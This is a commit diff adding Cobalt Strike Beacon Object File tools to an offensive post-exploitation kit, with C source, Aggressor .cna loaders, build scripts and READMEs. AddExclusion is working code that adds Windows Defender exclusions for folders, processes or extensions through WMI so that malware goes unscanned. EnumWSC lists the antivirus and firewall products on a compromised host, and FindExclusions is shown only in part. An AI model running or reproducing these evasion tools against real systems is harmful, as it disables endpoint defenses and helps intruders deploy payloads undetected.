New tool update

KIT/AddExclusion/README.md

@@ -0,0 +1,26 @@
+# AddExclusion
+Add a new exclusion to Windows Defender for a folder, file, process or extension. 
+
+>This operation requires elevated privileges. Furthermore, currently only Windows Defender exclusions are supported. However, this code is easily enhanced to also support other AV products that communicate via WMI. 
+
+
+## Arguments
+* `<exclusion type>`: specify one of the following exclusion types: `path` (file/folder), `process`, `extension`.
+* `<exclusion data>`: specify the data to add as an exclusion.
+
+
+## Usage
+* `addexclusion <exclusion type> <exclusion data>`
+
+
+## Example
+* `addexclusion path C:\Users\Public\Downloads`
+* `addexclusion process example.exe`
+* `addexclusion extension .xll`
+
+
+## Compile
+- 1\. Make sure Visual Studio is installed and supports C/C++.
+- 2\. Open the `x64 Native Tools Command Prompt for VS <2019/2022>` terminal.
+- 3\. Run the `bofcompile.bat` script to compile the object file. 
+- 4\. In Cobalt strike, use the script manager to load the .cna script to import the tool. 

KIT/AddExclusion/addexclusion.c

@@ -0,0 +1,145 @@
+#include <stdio.h>
+#include <Windows.h>
+#include <wbemidl.h>
+#include "addexclusion.h"
+#include "beacon.h"
+
+#pragma comment(lib, "wbemuuid.lib")
+#pragma comment(lib, "ole32.lib")
+#pragma comment(lib, "oleaut32.lib")
+
+typedef enum {
+    EXCLUSION_TYPE_PATH,
+    EXCLUSION_TYPE_PROCESS,
+    EXCLUSION_TYPE_EXTENSION
+} EXCLUSION_TYPE;
+
+INT AddDefenderExclusion(const WCHAR* exclData, EXCLUSION_TYPE type) {
+    HRESULT hr;
+    IWbemLocator* pLoc = NULL;
+    IWbemServices* pSvc = NULL;
+    IWbemClassObject* pClass = NULL;
+    IWbemClassObject* pInSignature = NULL;
+    IWbemClassObject* pClassInstance = NULL;
+    SAFEARRAY* psaStrings = NULL;
+    BSTR Clname = NULL;
+    BSTR MethodName = NULL;
+	int result = 0;
+
+    hr = OLE32$CoInitializeEx(0, COINIT_MULTITHREADED);
+    if (FAILED(hr)) goto Cleanup;
+
+    hr = OLE32$CoInitializeSecurity(NULL, -1, NULL, NULL, RPC_C_AUTHN_LEVEL_DEFAULT, RPC_C_IMP_LEVEL_IMPERSONATE, NULL, EOAC_NONE, NULL);
+    if (FAILED(hr)) goto Cleanup;
+
+	IID CLSIDWbemLocator = {0x4590f811, 0x1d3a, 0x11d0, {0x89, 0x1f, 0x00, 0xaa, 0x00, 0x4b, 0x2e, 0x24}};
+    IID IIDIWbemLocator = {0xdc12a687, 0x737f, 0x11cf, {0x88, 0x4d, 0x00, 0xaa, 0x00, 0x4b, 0x2e, 0x24}};
+    hr = OLE32$CoCreateInstance(&CLSIDWbemLocator, 0, CLSCTX_INPROC_SERVER, &IIDIWbemLocator, (LPVOID*)&pLoc);
+    if (FAILED(hr)) goto Cleanup;
+
+    Clname = OLEAUT32$SysAllocString(L"ROOT\\Microsoft\\Windows\\Defender");
+    hr = pLoc->lpVtbl->ConnectServer(pLoc, Clname, NULL, NULL, 0, NULL, 0, 0, &pSvc);
+    OLEAUT32$SysFreeString(Clname);
+    if (FAILED(hr)) goto Cleanup;
+	
+    hr = OLE32$CoSetProxyBlanket(pSvc, RPC_C_AUTHN_WINNT, RPC_C_AUTHZ_NONE, NULL, RPC_C_AUTHN_LEVEL_CALL, RPC_C_IMP_LEVEL_IMPERSONATE, NULL, EOAC_NONE);
+    if (FAILED(hr)) goto Cleanup;
+
+    Clname = OLEAUT32$SysAllocString(L"MSFT_MpPreference");
+    MethodName = OLEAUT32$SysAllocString(L"Add");
+    hr = pSvc->lpVtbl->GetObject(pSvc, Clname, 0, NULL, &pClass, NULL);
+    hr = pClass->lpVtbl->GetMethod(pClass, MethodName, 0, &pInSignature, NULL);
+
+    OLEAUT32$SysFreeString(MethodName);
+    if (FAILED(hr)) goto Cleanup;
+
+    hr = pInSignature->lpVtbl->SpawnInstance(pInSignature, 0, &pClassInstance);
+    if (FAILED(hr)) goto Cleanup;
+
+    SAFEARRAYBOUND rgsaBounds[1];
+    rgsaBounds[0].cElements = 1;
+    rgsaBounds[0].lLbound = 0;
+    psaStrings = OLEAUT32$SafeArrayCreate(VT_BSTR, 1, rgsaBounds);
+
+    VARIANT vString;
+    OLEAUT32$VariantInit(&vString);
+    V_VT(&vString) = VT_BSTR;
+    V_BSTR(&vString) = OLEAUT32$SysAllocString(exclData);
+    LONG lArrayIndex = 0;
+    OLEAUT32$SafeArrayPutElement(psaStrings, &lArrayIndex, V_BSTR(&vString));
+    OLEAUT32$SysFreeString(V_BSTR(&vString));
+
+    VARIANT vStringList;
+    OLEAUT32$VariantInit(&vStringList);
+    V_VT(&vStringList) = VT_ARRAY | VT_BSTR;
+    V_ARRAY(&vStringList) = psaStrings;
+
+    WCHAR* propertyName;
+    switch (type) {
+        case EXCLUSION_TYPE_PATH:
+            propertyName = L"ExclusionPath";
+            break;
+        case EXCLUSION_TYPE_PROCESS:
+            propertyName = L"ExclusionProcess";
+            break;
+        case EXCLUSION_TYPE_EXTENSION:
+            propertyName = L"ExclusionExtension";
+            break;
+        default:
+            hr = E_INVALIDARG;
+            goto Cleanup;
+    }
+
+    hr = pClassInstance->lpVtbl->Put(pClassInstance, propertyName, 0, &vStringList, CIM_STRING|CIM_FLAG_ARRAY);
+    if (FAILED(hr)) goto Cleanup;
+
+    hr = pSvc->lpVtbl->ExecMethod(pSvc, Clname, MethodName, 0, NULL, pClassInstance, NULL, NULL);
+    if (FAILED(hr)) {
+		result = 2;
+        goto Cleanup;
+    }
+	result = 1;
+
+Cleanup:
+	if (psaStrings) OLEAUT32$SafeArrayDestroy(psaStrings);
+	if (Clname) OLEAUT32$SysFreeString(Clname);
+	if (pLoc) pLoc->lpVtbl->Release(pLoc);
+	if (pSvc) pSvc->lpVtbl->Release(pSvc);
+	if (pClass) pClass->lpVtbl->Release(pClass);
+	if (pInSignature) pInSignature->lpVtbl->Release(pInSignature);
+	if (pClassInstance) pClassInstance->lpVtbl->Release(pClassInstance);
+	OLE32$CoUninitialize();
+
+	return result;
+}
+
+
+
+int go(char *args, int len) {
+    int result = 0; 
+	CHAR* exclType = ""; //path | process | extension
+	WCHAR* exclData = L""; 
+	datap parser;
+	
+    BeaconDataParse(&parser, args, len);
+	exclType = BeaconDataExtract(&parser, NULL);
+    exclData = BeaconDataExtract(&parser, NULL);
+	
+	BeaconPrintf(CALLBACK_OUTPUT, "exclType: %s\n", exclType);  //DEBUG
+	BeaconPrintf(CALLBACK_OUTPUT, "exclData: %ls\n", exclData);  //DEBUG
+
+	
+	if(MSVCRT$strcmp(exclType, "path") == 0) result = AddDefenderExclusion(exclData, EXCLUSION_TYPE_PATH);
+    else if(MSVCRT$strcmp(exclType, "process") == 0) result = AddDefenderExclusion(exclData, EXCLUSION_TYPE_PROCESS);
+	else if(MSVCRT$strcmp(exclType, "extension") == 0) result = AddDefenderExclusion(exclData, EXCLUSION_TYPE_EXTENSION);
+	else {
+		BeaconPrintf(CALLBACK_ERROR, "Please specify one of the following exclusion types: path (folder/file), process, extension.\n");
+		return 0;
+	}
+	
+    if(result == 1) BeaconPrintf(CALLBACK_OUTPUT, "[+] The following exclusion was successfully added: %ls\n", exclData); 
+	else if (result == 2) BeaconPrintf(CALLBACK_ERROR, "Failed to add the exclusion. Do you have sufficient permissions?");
+	else BeaconPrintf(CALLBACK_ERROR, "Failed to add exclusion. COM error occurred!\n"); 
+
+    return 0;
+}

KIT/AddExclusion/addexclusion.cna

@@ -0,0 +1,46 @@
+# author REDMED-X
+
+beacon_command_register(
+	"addexclusion", "Add a new exclusion to Windows Defender for a folder, file, process or extension.",
+	"INFO:\nAdd a new exclusion to Windows Defender for a folder, file, process or extension.\n\n" .
+	"ARGUMENTS:\n[<exclusion type>]: specify one of the following exclusion types: path (file/folder), process, extension.\n[<exclusion data>]: specify the data to add as an exclusion.\n\n" .
+	"USAGE:\naddexclusion <exclusion type> <exclusion data>\n\n" .
+	"EXAMPLES:\naddexclusion path C:\\Users\\Public\\Downloads\naddexclusion process example.exe\naddexclusion extension .xll\n\n");
+	
+alias addexclusion {
+    $bid = $1;
+    $excltype = $2;
+    $excldata = $3;
+
+    if ($excltype eq "") {
+        berror($bid, "Please specify one of the following extension types: path | process | extension.\n");
+        return;
+    }
+
+    if ($excltype eq "path" || $excltype eq "process" || $excltype eq "extension") {
+        if ($excldata eq "") {
+            berror($bid, "Please specify the data to add as an exclusion.\n");
+            return;
+        }
+    }
+    else {
+        berror($bid, "This exclusion type isn't supported. Please specify one of the following options: path | process | extension.\n");
+        return;
+    }
+	
+    # Read in the right BOF file
+    $handle = openf(script_resource("addexclusion.o"));
+    $data   = readb($handle, -1);
+    closef($handle);
+
+    # Pack our arguments
+    $arg_data  = bof_pack($bid, "zZ", $excltype, $excldata);
+
+    blog($bid, "Tasked to add a new exclusion..");
+    beacon_inline_execute($bid, $data, "go", $arg_data);
+}
+
+
+
+
+

KIT/AddExclusion/addexclusion.h

@@ -0,0 +1,19 @@
+#include <windows.h>  
+
+//AddDefenderExclusion
+DECLSPEC_IMPORT HRESULT WINAPI OLE32$CoInitializeEx(LPVOID pvReserved, DWORD dwCoInit);
+DECLSPEC_IMPORT void WINAPI OLE32$CoUninitialize(void);
+DECLSPEC_IMPORT HRESULT WINAPI OLE32$CoCreateInstance (REFCLSID rclsid, LPUNKNOWN pUnkOuter, DWORD dwClsContext, REFIID riid, LPVOID *ppv);
+DECLSPEC_IMPORT HRESULT WINAPI OLE32$CoInitializeSecurity(PSECURITY_DESCRIPTOR, LONG, SOLE_AUTHENTICATION_SERVICE*, void*, DWORD, DWORD, void*, DWORD, void*);
+DECLSPEC_IMPORT HRESULT WINAPI OLE32$CoSetProxyBlanket(IUnknown*, DWORD, DWORD, OLECHAR*, DWORD, DWORD, RPC_AUTH_IDENTITY_HANDLE, DWORD);
+
+DECLSPEC_IMPORT HRESULT WINAPI OLEAUT32$SafeArrayDestroy(SAFEARRAY* psa);
+DECLSPEC_IMPORT SAFEARRAY* WINAPI OLEAUT32$SafeArrayCreate(VARTYPE vt, unsigned int cDims, SAFEARRAYBOUND* rgsabound);
+DECLSPEC_IMPORT HRESULT WINAPI OLEAUT32$SafeArrayPutElement(SAFEARRAY* psa, long* rgIndices, void* pv);
+
+DECLSPEC_IMPORT void WINAPI OLEAUT32$VariantInit(VARIANTARG *pvarg);
+DECLSPEC_IMPORT void WINAPI OLEAUT32$VariantClear(VARIANTARG *pvarg);
+WINBASEAPI BSTR WINAPI OLEAUT32$SysAllocString(const OLECHAR *);
+WINBASEAPI void WINAPI OLEAUT32$SysFreeString(BSTR);
+WINBASEAPI int __cdecl MSVCRT$printf(const char * _Format,...);
+WINBASEAPI int __cdecl MSVCRT$strcmp(const char *str1, const char *str2);

KIT/AddExclusion/beacon.h

@@ -0,0 +1,69 @@
+/*
+ * Beacon Object Files (BOF)
+ * -------------------------
+ * A Beacon Object File is a light-weight post exploitation tool that runs
+ * with Beacon's inline-execute command.
+ *
+ * Additional BOF resources are available here:
+ *   - https://github.com/Cobalt-Strike/bof_template
+ *
+ * Cobalt Strike 4.x
+ * ChangeLog:
+ *    1/25/2022: updated for 4.5
+ */
+
+/* data API */
+typedef struct {
+	char * original; /* the original buffer [so we can free it] */
+	char * buffer;   /* current pointer into our buffer */
+	int    length;   /* remaining length of data */
+	int    size;     /* total size of this buffer */
+} datap;
+
+DECLSPEC_IMPORT void    BeaconDataParse(datap * parser, char * buffer, int size);
+DECLSPEC_IMPORT char *  BeaconDataPtr(datap * parser, int size);
+DECLSPEC_IMPORT int     BeaconDataInt(datap * parser);
+DECLSPEC_IMPORT short   BeaconDataShort(datap * parser);
+DECLSPEC_IMPORT int     BeaconDataLength(datap * parser);
+DECLSPEC_IMPORT char *  BeaconDataExtract(datap * parser, int * size);
+
+/* format API */
+typedef struct {
+	char * original; /* the original buffer [so we can free it] */
+	char * buffer;   /* current pointer into our buffer */
+	int    length;   /* remaining length of data */
+	int    size;     /* total size of this buffer */
+} formatp;
+
+DECLSPEC_IMPORT void    BeaconFormatAlloc(formatp * format, int maxsz);
+DECLSPEC_IMPORT void    BeaconFormatReset(formatp * format);
+DECLSPEC_IMPORT void    BeaconFormatAppend(formatp * format, char * text, int len);
+DECLSPEC_IMPORT void    BeaconFormatPrintf(formatp * format, char * fmt, ...);
+DECLSPEC_IMPORT char *  BeaconFormatToString(formatp * format, int * size);
+DECLSPEC_IMPORT void    BeaconFormatFree(formatp * format);
+DECLSPEC_IMPORT void    BeaconFormatInt(formatp * format, int value);
+
+/* Output Functions */
+#define CALLBACK_OUTPUT      0x0
+#define CALLBACK_OUTPUT_OEM  0x1e
+#define CALLBACK_OUTPUT_UTF8 0x20
+#define CALLBACK_ERROR       0x0d
+
+DECLSPEC_IMPORT void   BeaconOutput(int type, char * data, int len);
+DECLSPEC_IMPORT void   BeaconPrintf(int type, char * fmt, ...);
+
+
+/* Token Functions */
+DECLSPEC_IMPORT BOOL   BeaconUseToken(HANDLE token);
+DECLSPEC_IMPORT void   BeaconRevertToken();
+DECLSPEC_IMPORT BOOL   BeaconIsAdmin();
+
+/* Spawn+Inject Functions */
+DECLSPEC_IMPORT void   BeaconGetSpawnTo(BOOL x86, char * buffer, int length);
+DECLSPEC_IMPORT void   BeaconInjectProcess(HANDLE hProc, int pid, char * payload, int p_len, int p_offset, char * arg, int a_len);
+DECLSPEC_IMPORT void   BeaconInjectTemporaryProcess(PROCESS_INFORMATION * pInfo, char * payload, int p_len, int p_offset, char * arg, int a_len);
+DECLSPEC_IMPORT BOOL   BeaconSpawnTemporaryProcess(BOOL x86, BOOL ignoreToken, STARTUPINFO * si, PROCESS_INFORMATION * pInfo);
+DECLSPEC_IMPORT void   BeaconCleanupProcess(PROCESS_INFORMATION * pInfo);
+
+/* Utility Functions */
+DECLSPEC_IMPORT BOOL   toWideChar(char * src, wchar_t * dst, int max);

KIT/AddExclusion/bofcompile.bat

@@ -0,0 +1,5 @@
+@ECHO OFF
+
+cl.exe /nologo /c /Od /MT /W0 /GS- /Tc addexclusion.c
+move /y addexclusion.obj addexclusion.o
+

KIT/EnumWSC/README.md

@@ -0,0 +1,20 @@
+# EnumWSC
+Get a list of security products (antivirus, firewall, antispyware) that are registered in the Windows Security Center. 
+
+>This only works if WSC is running (typically only on Windows clients).
+
+## Arguments
+* `<option>`: specify one of the following options to request related security information from WSC: `av` (antivirus), `fw` (firewall), `as` (antispyware).`
+
+## Usage
+* `enumwsc <option>`
+
+## Examples
+* `enumwsc av`
+
+
+## Compile
+- 1\. Make sure Visual Studio is installed and supports C/C++.
+- 2\. Open the `x64 Native Tools Command Prompt for VS <2019/2022>` terminal.
+- 3\. Run the `bofcompile.bat` script to compile the object file. 
+- 4\. In Cobalt strike, use the script manager to load the .cna script to import the tool. 

KIT/EnumWSC/beacon.h

@@ -0,0 +1,69 @@
+/*
+ * Beacon Object Files (BOF)
+ * -------------------------
+ * A Beacon Object File is a light-weight post exploitation tool that runs
+ * with Beacon's inline-execute command.
+ *
+ * Additional BOF resources are available here:
+ *   - https://github.com/Cobalt-Strike/bof_template
+ *
+ * Cobalt Strike 4.x
+ * ChangeLog:
+ *    1/25/2022: updated for 4.5
+ */
+
+/* data API */
+typedef struct {
+	char * original; /* the original buffer [so we can free it] */
+	char * buffer;   /* current pointer into our buffer */
+	int    length;   /* remaining length of data */
+	int    size;     /* total size of this buffer */
+} datap;
+
+DECLSPEC_IMPORT void    BeaconDataParse(datap * parser, char * buffer, int size);
+DECLSPEC_IMPORT char *  BeaconDataPtr(datap * parser, int size);
+DECLSPEC_IMPORT int     BeaconDataInt(datap * parser);
+DECLSPEC_IMPORT short   BeaconDataShort(datap * parser);
+DECLSPEC_IMPORT int     BeaconDataLength(datap * parser);
+DECLSPEC_IMPORT char *  BeaconDataExtract(datap * parser, int * size);
+
+/* format API */
+typedef struct {
+	char * original; /* the original buffer [so we can free it] */
+	char * buffer;   /* current pointer into our buffer */
+	int    length;   /* remaining length of data */
+	int    size;     /* total size of this buffer */
+} formatp;
+
+DECLSPEC_IMPORT void    BeaconFormatAlloc(formatp * format, int maxsz);
+DECLSPEC_IMPORT void    BeaconFormatReset(formatp * format);
+DECLSPEC_IMPORT void    BeaconFormatAppend(formatp * format, char * text, int len);
+DECLSPEC_IMPORT void    BeaconFormatPrintf(formatp * format, char * fmt, ...);
+DECLSPEC_IMPORT char *  BeaconFormatToString(formatp * format, int * size);
+DECLSPEC_IMPORT void    BeaconFormatFree(formatp * format);
+DECLSPEC_IMPORT void    BeaconFormatInt(formatp * format, int value);
+
+/* Output Functions */
+#define CALLBACK_OUTPUT      0x0
+#define CALLBACK_OUTPUT_OEM  0x1e
+#define CALLBACK_OUTPUT_UTF8 0x20
+#define CALLBACK_ERROR       0x0d
+
+DECLSPEC_IMPORT void   BeaconOutput(int type, char * data, int len);
+DECLSPEC_IMPORT void   BeaconPrintf(int type, char * fmt, ...);
+
+
+/* Token Functions */
+DECLSPEC_IMPORT BOOL   BeaconUseToken(HANDLE token);
+DECLSPEC_IMPORT void   BeaconRevertToken();
+DECLSPEC_IMPORT BOOL   BeaconIsAdmin();
+
+/* Spawn+Inject Functions */
+DECLSPEC_IMPORT void   BeaconGetSpawnTo(BOOL x86, char * buffer, int length);
+DECLSPEC_IMPORT void   BeaconInjectProcess(HANDLE hProc, int pid, char * payload, int p_len, int p_offset, char * arg, int a_len);
+DECLSPEC_IMPORT void   BeaconInjectTemporaryProcess(PROCESS_INFORMATION * pInfo, char * payload, int p_len, int p_offset, char * arg, int a_len);
+DECLSPEC_IMPORT BOOL   BeaconSpawnTemporaryProcess(BOOL x86, BOOL ignoreToken, STARTUPINFO * si, PROCESS_INFORMATION * pInfo);
+DECLSPEC_IMPORT void   BeaconCleanupProcess(PROCESS_INFORMATION * pInfo);
+
+/* Utility Functions */
+DECLSPEC_IMPORT BOOL   toWideChar(char * src, wchar_t * dst, int max);

KIT/EnumWSC/bofcompile.bat

@@ -0,0 +1,6 @@
+@ECHO OFF
+
+cl.exe /nologo /c /Od /MT /W0 /GS- /Tc enumwsc.c
+move /y enumwsc.obj enumwsc.o
+
+

KIT/EnumWSC/enumwsc.c

@@ -0,0 +1,196 @@
+#include <Windows.h>
+#include <stdio.h>
+#include <wscapi.h>
+#include <iwscapi.h>
+#include "enumwsc.h"
+#include "beacon.h"
+
+#pragma comment(lib, "ole32.lib")
+#pragma comment(lib, "oleaut32.lib")
+#pragma comment(lib, "wscapi.lib")
+
+
+//START TrustedSec BOF print code: https://github.com/trustedsec/CS-Situational-Awareness-BOF/blob/master/src/common/base.c
+#ifndef bufsize
+#define bufsize 8192
+#endif
+char *output = 0;  
+WORD currentoutsize = 0;
+HANDLE trash = NULL; 
+int bofstart();
+void internal_printf(const char* format, ...);
+void printoutput(BOOL done);
+
+int bofstart() {   
+    output = (char*)MSVCRT$calloc(bufsize, 1);
+    currentoutsize = 0;
+    return 1;
+}
+
+void internal_printf(const char* format, ...){
+    int buffersize = 0;
+    int transfersize = 0;
+    char * curloc = NULL;
+    char* intBuffer = NULL;
+    va_list args;
+    va_start(args, format);
+    buffersize = MSVCRT$vsnprintf(NULL, 0, format, args); 
+    va_end(args);
+    
+    if (buffersize == -1) return;
+    
+    char* transferBuffer = (char*)KERNEL32$HeapAlloc(KERNEL32$GetProcessHeap(), HEAP_ZERO_MEMORY, bufsize);
+	intBuffer = (char*)KERNEL32$HeapAlloc(KERNEL32$GetProcessHeap(), HEAP_ZERO_MEMORY, buffersize);
+    va_start(args, format);
+    MSVCRT$vsnprintf(intBuffer, buffersize, format, args); 
+    va_end(args);
+    if(buffersize + currentoutsize < bufsize) 
+    {
+        MSVCRT$memcpy(output+currentoutsize, intBuffer, buffersize);
+        currentoutsize += buffersize;
+    } else {
+        curloc = intBuffer;
+        while(buffersize > 0)
+        {
+            transfersize = bufsize - currentoutsize;
+            if(buffersize < transfersize) 
+            {
+                transfersize = buffersize;
+            }
+            MSVCRT$memcpy(output+currentoutsize, curloc, transfersize);
+            currentoutsize += transfersize;
+            if(currentoutsize == bufsize)
+            {
+                printoutput(FALSE); 
+            }
+            MSVCRT$memset(transferBuffer, 0, transfersize); 
+            curloc += transfersize; 
+            buffersize -= transfersize;
+        }
+    }
+	KERNEL32$HeapFree(KERNEL32$GetProcessHeap(), 0, intBuffer);
+	KERNEL32$HeapFree(KERNEL32$GetProcessHeap(), 0, transferBuffer);
+}
+
+void printoutput(BOOL done) {
+    char * msg = NULL;
+    BeaconOutput(CALLBACK_OUTPUT, output, currentoutsize);
+    currentoutsize = 0;
+    MSVCRT$memset(output, 0, bufsize);
+    if(done) {MSVCRT$free(output); output=NULL;}
+}
+//END TrustedSec BOF print code.
+
+
+HRESULT GetSecurityProducts(WSC_SECURITY_PROVIDER provider) {
+    HRESULT hr;
+    IWscProduct* PtrProduct = NULL;
+    IWSCProductList* PtrProductList = NULL;
+    BSTR PtrVal = NULL;
+    LONG ProductCount = 0;
+    WSC_SECURITY_PRODUCT_STATE ProductState;
+    WSC_SECURITY_SIGNATURE_STATUS ProductStatus;
+
+    if (provider != WSC_SECURITY_PROVIDER_FIREWALL &&
+        provider != WSC_SECURITY_PROVIDER_ANTIVIRUS &&
+        provider != WSC_SECURITY_PROVIDER_ANTISPYWARE) {
+        hr = E_INVALIDARG;
+        goto Cleanup;
+    }
+	
+    hr = OLE32$CoInitializeEx(0, COINIT_APARTMENTTHREADED);
+    if (FAILED(hr)) goto Cleanup;
+
+    IID CLSIDWSCProductList = {0x17072f7b, 0x9abe, 0x4a74, {0xa2, 0x61, 0x1e, 0xb7, 0x6b, 0x55, 0x10, 0x7a}};
+    IID IIDIWSCProductList = {0x722a338c, 0x6e8e, 0x4e72, {0xac, 0x27, 0x14, 0x17, 0xfb, 0x0c, 0x81, 0xc2}};
+    hr = OLE32$CoCreateInstance(&CLSIDWSCProductList, NULL, CLSCTX_INPROC_SERVER, &IIDIWSCProductList, (LPVOID*)&PtrProductList);
+    if (FAILED(hr)) {
+        if (hr == 0x80040154) {
+            BeaconPrintf(CALLBACK_ERROR, "Windows Security Center is not running on this system.");
+        } 
+        goto Cleanup;
+    }
+	
+	if (provider == WSC_SECURITY_PROVIDER_ANTIVIRUS) internal_printf("\nFound registered antivirus product(s) in WSC:\n====================================================\n");
+	else if (provider == WSC_SECURITY_PROVIDER_FIREWALL) internal_printf("\nFound registered firewall product(s) in WSC:\n====================================================\n");
+	else internal_printf("\nFound registered antispyware product(s) in WSC:\n====================================================\n");
+	
+
+    hr = PtrProductList->lpVtbl->Initialize(PtrProductList, provider);
+    if (FAILED(hr)) goto Cleanup;
+
+    hr = PtrProductList->lpVtbl->get_Count(PtrProductList, &ProductCount);
+    if (FAILED(hr)) goto Cleanup;
+
+    for (LONG i = 0; i < ProductCount; i++) {
+        hr = PtrProductList->lpVtbl->get_Item(PtrProductList, i, &PtrProduct);
+        if (FAILED(hr)) goto Cleanup;
+
+        hr = PtrProduct->lpVtbl->get_ProductName(PtrProduct, &PtrVal);
+        if (FAILED(hr)) goto Cleanup;
+
+        internal_printf("%ls\n", PtrVal);
+        OLEAUT32$SysFreeString(PtrVal);
+        PtrVal = NULL;
+
+        hr = PtrProduct->lpVtbl->get_ProductState(PtrProduct, &ProductState);
+        if (FAILED(hr)) goto Cleanup;
+
+        const char* pszState;
+        if (ProductState == WSC_SECURITY_PRODUCT_STATE_ON) {
+            pszState = "On";
+        } else if (ProductState == WSC_SECURITY_PRODUCT_STATE_OFF) {
+            pszState = "Off";
+        } else if (ProductState == WSC_SECURITY_PRODUCT_STATE_SNOOZED) {
+            pszState = "Snoozed";
+        } else {
+            pszState = "Expired";
+        }
+        internal_printf("- Product state: %s\n", pszState);
+
+        hr = PtrProduct->lpVtbl->get_SignatureStatus(PtrProduct, &ProductStatus);
+        if (FAILED(hr)) goto Cleanup;
+
+        const char* pszStatus = (ProductStatus == WSC_SECURITY_PRODUCT_UP_TO_DATE) ? "Up-to-date" : "Out-of-date";
+        internal_printf("- Product status: %s\n", pszStatus);
+
+        PtrProduct->lpVtbl->Release(PtrProduct);
+        PtrProduct = NULL;
+		
+		internal_printf("----------------------------------------------------\n\n");
+    }
+
+Cleanup:
+    if (PtrVal) OLEAUT32$SysFreeString(PtrVal);
+    if (PtrProductList) PtrProductList->lpVtbl->Release(PtrProductList);
+    if (PtrProduct) PtrProduct->lpVtbl->Release(PtrProduct);
+    OLE32$CoUninitialize();
+
+    return hr;
+}
+
+int go(char *args, int len) {
+	HRESULT hr;
+	CHAR* option = "";
+    datap parser;
+	
+    BeaconDataParse(&parser, args, len);
+    option = BeaconDataExtract(&parser, NULL);
+	if(!bofstart()) return;
+	
+	if (MSVCRT$strcmp(option, "av") == 0) hr = GetSecurityProducts(WSC_SECURITY_PROVIDER_ANTIVIRUS);
+	else if (MSVCRT$strcmp(option, "fw") == 0) hr = GetSecurityProducts(WSC_SECURITY_PROVIDER_FIREWALL);
+	else if (MSVCRT$strcmp(option, "as") == 0) hr = GetSecurityProducts(WSC_SECURITY_PROVIDER_ANTISPYWARE);
+	else {
+		BeaconPrintf(CALLBACK_ERROR, "Please specify one of following options: av | fw | as\n");
+		return 0;
+	}
+	
+    if (SUCCEEDED(hr)) {
+        printoutput(TRUE);
+    } else {
+        BeaconPrintf(CALLBACK_ERROR, "Failed to enumerate security products from WSC.\n");
+    }
+
+    return 0;
+}

KIT/EnumWSC/enumwsc.cna

@@ -0,0 +1,33 @@
+# author REDMED-X
+
+beacon_command_register(
+	"enumwsc", "List what security products are registered in Windows Security Center.\n",
+	"INFO:\nGet a list of security products (antivirus, firewall, antispyware) that are registered in Windows Security Center. This only works if WSC is running (typically only on Windows clients).\n\n" .
+	"ARGUMENTS:\n[option]: specify one of the following options to request related security information from WSC: av (antivirus), fw (firewall), as (antispyware).\n\n" .
+	"USAGE:\nenumwsc <option>\n\n" .
+	"EXAMPLES:\nenumwsc av\n\n");
+	
+alias enumwsc {
+    $bid = $1;
+    $option = $2;
+
+	# Verify user input
+	if ($option eq "") {
+		berror($bid, "Please specify one of the following options: av | fw | as\n");
+		return;
+	}
+	
+    # Read in the right BOF file
+    $handle = openf(script_resource("enumwsc.o"));
+    $data   = readb($handle, -1);
+    closef($handle);
+
+	# Pack our arguments
+    $arg_data  = bof_pack($bid, "z", $option);
+	
+	blog($bid, "Tasked to enumerate security products registered in Windows Security Center..");
+    beacon_inline_execute($bid, $data, "go", $arg_data);
+}
+
+
+

KIT/EnumWSC/enumwsc.h

@@ -0,0 +1,24 @@
+#include <windows.h>  
+
+//GetSecurityProducts
+DECLSPEC_IMPORT HRESULT WINAPI OLE32$CoInitializeEx(LPVOID pvReserved, DWORD dwCoInit);
+DECLSPEC_IMPORT void WINAPI OLE32$CoUninitialize(void);
+DECLSPEC_IMPORT HRESULT WINAPI OLE32$CoCreateInstance (REFCLSID rclsid, LPUNKNOWN pUnkOuter, DWORD dwClsContext, REFIID riid, LPVOID *ppv);
+WINBASEAPI void WINAPI OLEAUT32$SysFreeString(BSTR);
+WINBASEAPI int __cdecl MSVCRT$printf(const char * _Format,...);
+WINBASEAPI int __cdecl MSVCRT$strcmp(const char *str1, const char *str2);
+
+//bofstart + internal_printf + printoutput
+WINBASEAPI void *__cdecl MSVCRT$calloc(size_t number, size_t size);
+WINBASEAPI int WINAPI MSVCRT$vsnprintf(char* buffer, size_t count, const char* format, va_list arg);
+WINBASEAPI void __cdecl MSVCRT$memset(void *dest, int c, size_t count);
+WINBASEAPI void* WINAPI MSVCRT$memcpy(void* dest, const void* src, size_t count);
+WINBASEAPI HANDLE WINAPI KERNEL32$GetProcessHeap();
+WINBASEAPI LPVOID WINAPI KERNEL32$HeapAlloc(HANDLE hHeap, DWORD dwFlags, SIZE_T dwBytes);
+WINBASEAPI void __cdecl MSVCRT$free(void *memblock);
+WINBASEAPI BOOL WINAPI KERNEL32$HeapFree(HANDLE, DWORD, PVOID);
+
+
+
+
+

KIT/FindExclusions/README.md

@@ -0,0 +1,15 @@
+# FindExclusions
+Check Windows Defender for excluded files, folders, extentions and processes.
+
+>This operation requires elevated privileges. Furthermore, currently only Windows Defender exclusions are supported. However, this code is easily enhanced to also support other AV products that communicate via WMI. 
+
+
+## Usage
+* `findexclusions`
+
+
+## Compile
+- 1\. Make sure Visual Studio is installed and supports C/C++.
+- 2\. Open the `x64 Native Tools Command Prompt for VS <2019/2022>` terminal.
+- 3\. Run the `bofcompile.bat` script to compile the object file. 
+- 4\. In Cobalt strike, use the script manager to load the .cna script to import the tool. 

KIT/FindExclusions/beacon.h

@@ -0,0 +1,69 @@
+/*
+ * Beacon Object Files (BOF)
+ * -------------------------
+ * A Beacon Object File is a light-weight post exploitation tool that runs
+ * with Beacon's inline-execute command.
+ *
+ * Additional BOF resources are available here:
+ *   - https://github.com/Cobalt-Strike/bof_template
+ *
+ * Cobalt Strike 4.x
+ * ChangeLog:
+ *    1/25/2022: updated for 4.5
+ */
+
+/* data API */
+typedef struct {
+	char * original; /* the original buffer [so we can free it] */
+	char * buffer;   /* current pointer into our buffer */
+	int    length;   /* remaining length of data */
+	int    size;     /* total size of this buffer */
+} datap;
+
+DECLSPEC_IMPORT void    BeaconDataParse(datap * parser, char * buffer, int size);
+DECLSPEC_IMPORT char *  BeaconDataPtr(datap * parser, int size);
+DECLSPEC_IMPORT int     BeaconDataInt(datap * parser);
+DECLSPEC_IMPORT short   BeaconDataShort(datap * parser);
+DECLSPEC_IMPORT int     BeaconDataLength(datap * parser);
+DECLSPEC_IMPORT char *  BeaconDataExtract(datap * parser, int * size);
+
+/* format API */
+typedef struct {
+	char * original; /* the original buffer [so we can free it] */
+	char * buffer;   /* current pointer into our buffer */
+	int    length;   /* remaining length of data */
+	int    size;     /* total size of this buffer */
+} formatp;
+
